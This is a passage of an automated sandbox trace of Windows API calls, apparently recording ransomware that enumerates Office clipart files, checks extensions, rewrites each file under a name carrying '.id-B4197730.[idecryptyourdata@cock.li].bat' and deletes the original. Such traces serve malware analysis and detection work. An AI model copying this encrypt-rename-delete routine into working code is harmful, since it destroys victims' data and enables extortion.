lstrlenW (lpString=".xlsx") returned 5 [0061.505] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.505] lstrlenW (lpString=".ppt") returned 4 [0061.505] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.505] lstrlenW (lpString=".zip") returned 4 [0061.505] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.505] lstrlenW (lpString=".rar") returned 4 [0061.505] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.505] lstrlenW (lpString=".bz2") returned 4 [0061.505] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.507] lstrlenW (lpString=".7z") returned 3 [0061.507] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.507] lstrlenW (lpString=".dbf") returned 4 [0061.507] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.507] lstrlenW (lpString=".1cd") returned 4 [0061.507] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 68 [0061.508] lstrlenW (lpString=".jpg") returned 4 [0061.508] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.508] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.508] lstrlenW (lpString="AG00165_.GIF") returned 12 [0061.508] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.526] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=8582) returned 1 [0061.526] CloseHandle (hObject=0x368) returned 1 [0061.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 0x220 [0061.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.526] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.526] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.527] GetLastError () returned 0x0 [0061.527] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2186, lpOverlapped=0x0) returned 1 [0061.570] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2190, lpOverlapped=0x0) returned 1 [0061.571] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.571] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.572] SetEndOfFile (hFile=0x344) returned 1 [0061.572] CloseHandle (hObject=0x344) returned 1 [0061.573] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.573] SetEndOfFile (hFile=0x368) returned 1 [0061.574] CloseHandle (hObject=0x368) returned 1 [0061.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0061.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.574] lstrlenW (lpString=".doc") returned 4 [0061.574] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.574] lstrlenW (lpString=".docx") returned 5 [0061.574] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.575] lstrlenW (lpString=".pdf") returned 4 [0061.575] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.575] lstrlenW (lpString=".xls") returned 4 [0061.575] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.575] lstrlenW (lpString=".xlsx") returned 5 [0061.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.575] lstrlenW (lpString=".ppt") returned 4 [0061.575] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.575] lstrlenW (lpString=".zip") returned 4 [0061.575] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.575] lstrlenW (lpString=".rar") returned 4 [0061.575] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.575] lstrlenW (lpString=".bz2") returned 4 [0061.575] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.575] lstrlenW (lpString=".7z") returned 3 [0061.575] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.575] lstrlenW (lpString=".dbf") returned 4 [0061.575] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.575] lstrlenW (lpString=".1cd") returned 4 [0061.575] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.575] lstrlenW (lpString=".jpg") returned 4 [0061.575] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.575] lstrlenW (lpString=".doc") returned 4 [0061.576] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.576] lstrlenW (lpString=".docx") returned 5 [0061.576] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.576] lstrlenW (lpString=".pdf") returned 4 [0061.576] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.576] lstrlenW (lpString=".xls") returned 4 [0061.576] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.576] lstrlenW (lpString=".xlsx") returned 5 [0061.576] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.576] lstrlenW (lpString=".ppt") returned 4 [0061.576] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.576] lstrlenW (lpString=".zip") returned 4 [0061.576] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.576] lstrlenW (lpString=".rar") returned 4 [0061.576] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.576] lstrlenW (lpString=".bz2") returned 4 [0061.576] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.576] lstrlenW (lpString=".7z") returned 3 [0061.576] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.576] lstrlenW (lpString=".dbf") returned 4 [0061.576] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.576] lstrlenW (lpString=".1cd") returned 4 [0061.576] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 68 [0061.576] lstrlenW (lpString=".jpg") returned 4 [0061.576] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.577] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.577] lstrlenW (lpString="AG00167_.GIF") returned 12 [0061.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.577] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=4894) returned 1 [0061.577] CloseHandle (hObject=0x368) returned 1 [0061.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif")) returned 0x220 [0061.577] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.577] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.578] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0061.578] GetLastError () returned 0x0 [0061.578] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x131e, lpOverlapped=0x0) returned 1 [0061.597] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1320, lpOverlapped=0x0) returned 1 [0061.598] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.598] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.598] SetEndOfFile (hFile=0x344) returned 1 [0061.604] CloseHandle (hObject=0x344) returned 1 [0061.606] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.606] SetEndOfFile (hFile=0x368) returned 1 [0061.609] CloseHandle (hObject=0x368) returned 1 [0061.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0061.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.610] lstrlenW (lpString=".doc") returned 4 [0061.611] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.611] lstrlenW (lpString=".docx") returned 5 [0061.611] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.611] lstrlenW (lpString=".pdf") returned 4 [0061.611] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.611] lstrlenW (lpString=".xls") returned 4 [0061.611] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.611] lstrlenW (lpString=".xlsx") returned 5 [0061.611] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.611] lstrlenW (lpString=".ppt") returned 4 [0061.611] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.611] lstrlenW (lpString=".zip") returned 4 [0061.611] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.611] lstrlenW (lpString=".rar") returned 4 [0061.611] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.611] lstrlenW (lpString=".bz2") returned 4 [0061.611] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.611] lstrlenW (lpString=".7z") returned 3 [0061.611] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.611] lstrlenW (lpString=".dbf") returned 4 [0061.611] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.611] lstrlenW (lpString=".1cd") returned 4 [0061.611] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.611] lstrlenW (lpString=".jpg") returned 4 [0061.611] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.612] lstrlenW (lpString=".doc") returned 4 [0061.612] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.612] lstrlenW (lpString=".docx") returned 5 [0061.612] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.612] lstrlenW (lpString=".pdf") returned 4 [0061.612] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.612] lstrlenW (lpString=".xls") returned 4 [0061.612] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.612] lstrlenW (lpString=".xlsx") returned 5 [0061.612] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.612] lstrlenW (lpString=".ppt") returned 4 [0061.612] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.612] lstrlenW (lpString=".zip") returned 4 [0061.612] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.612] lstrlenW (lpString=".rar") returned 4 [0061.612] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.612] lstrlenW (lpString=".bz2") returned 4 [0061.612] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.612] lstrlenW (lpString=".7z") returned 3 [0061.612] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.612] lstrlenW (lpString=".dbf") returned 4 [0061.612] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.612] lstrlenW (lpString=".1cd") returned 4 [0061.613] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 68 [0061.613] lstrlenW (lpString=".jpg") returned 4 [0061.613] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.613] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0061.613] lstrlenW (lpString="AG00171_.GIF") returned 12 [0061.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.613] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=5016) returned 1 [0061.613] CloseHandle (hObject=0x368) returned 1 [0061.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 0x220 [0061.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0061.614] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.614] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0061.616] GetLastError () returned 0x0 [0061.617] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1398, lpOverlapped=0x0) returned 1 [0061.630] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13a0, lpOverlapped=0x0) returned 1 [0061.631] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.631] WriteFile (in: hFile=0x370, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.631] SetEndOfFile (hFile=0x370) returned 1 [0061.640] CloseHandle (hObject=0x370) returned 1 [0061.640] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.641] SetEndOfFile (hFile=0x368) returned 1 [0061.641] CloseHandle (hObject=0x368) returned 1 [0061.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.657] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0061.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.657] lstrlenW (lpString=".doc") returned 4 [0061.657] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.657] lstrlenW (lpString=".docx") returned 5 [0061.657] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.657] lstrlenW (lpString=".pdf") returned 4 [0061.657] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.657] lstrlenW (lpString=".xls") returned 4 [0061.658] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.658] lstrlenW (lpString=".xlsx") returned 5 [0061.658] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.658] lstrlenW (lpString=".ppt") returned 4 [0061.658] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.658] lstrlenW (lpString=".zip") returned 4 [0061.658] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0061.658] lstrlenW (lpString=".rar") returned 4 [0061.658] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0061.658] lstrlenW (lpString=".bz2") returned 4 [0061.658] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0061.658] lstrlenW (lpString=".7z") returned 3 [0061.658] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0061.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.658] lstrlenW (lpString=".dbf") returned 4 [0061.658] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0061.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.658] lstrlenW (lpString=".1cd") returned 4 [0061.658] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0061.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.658] lstrlenW (lpString=".jpg") returned 4 [0061.658] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0061.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.658] lstrlenW (lpString=".doc") returned 4 [0061.658] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0061.658] lstrlenW (lpString=".docx") returned 5 [0061.658] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0061.659] lstrlenW (lpString=".pdf") returned 4 [0061.659] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0061.659] lstrlenW (lpString=".xls") returned 4 [0061.659] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0061.659] lstrlenW (lpString=".xlsx") returned 5 [0061.659] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0061.659] lstrlenW (lpString=".ppt") returned 4 [0061.659] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0061.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0061.659] lstrlenW (lpString=".zip") 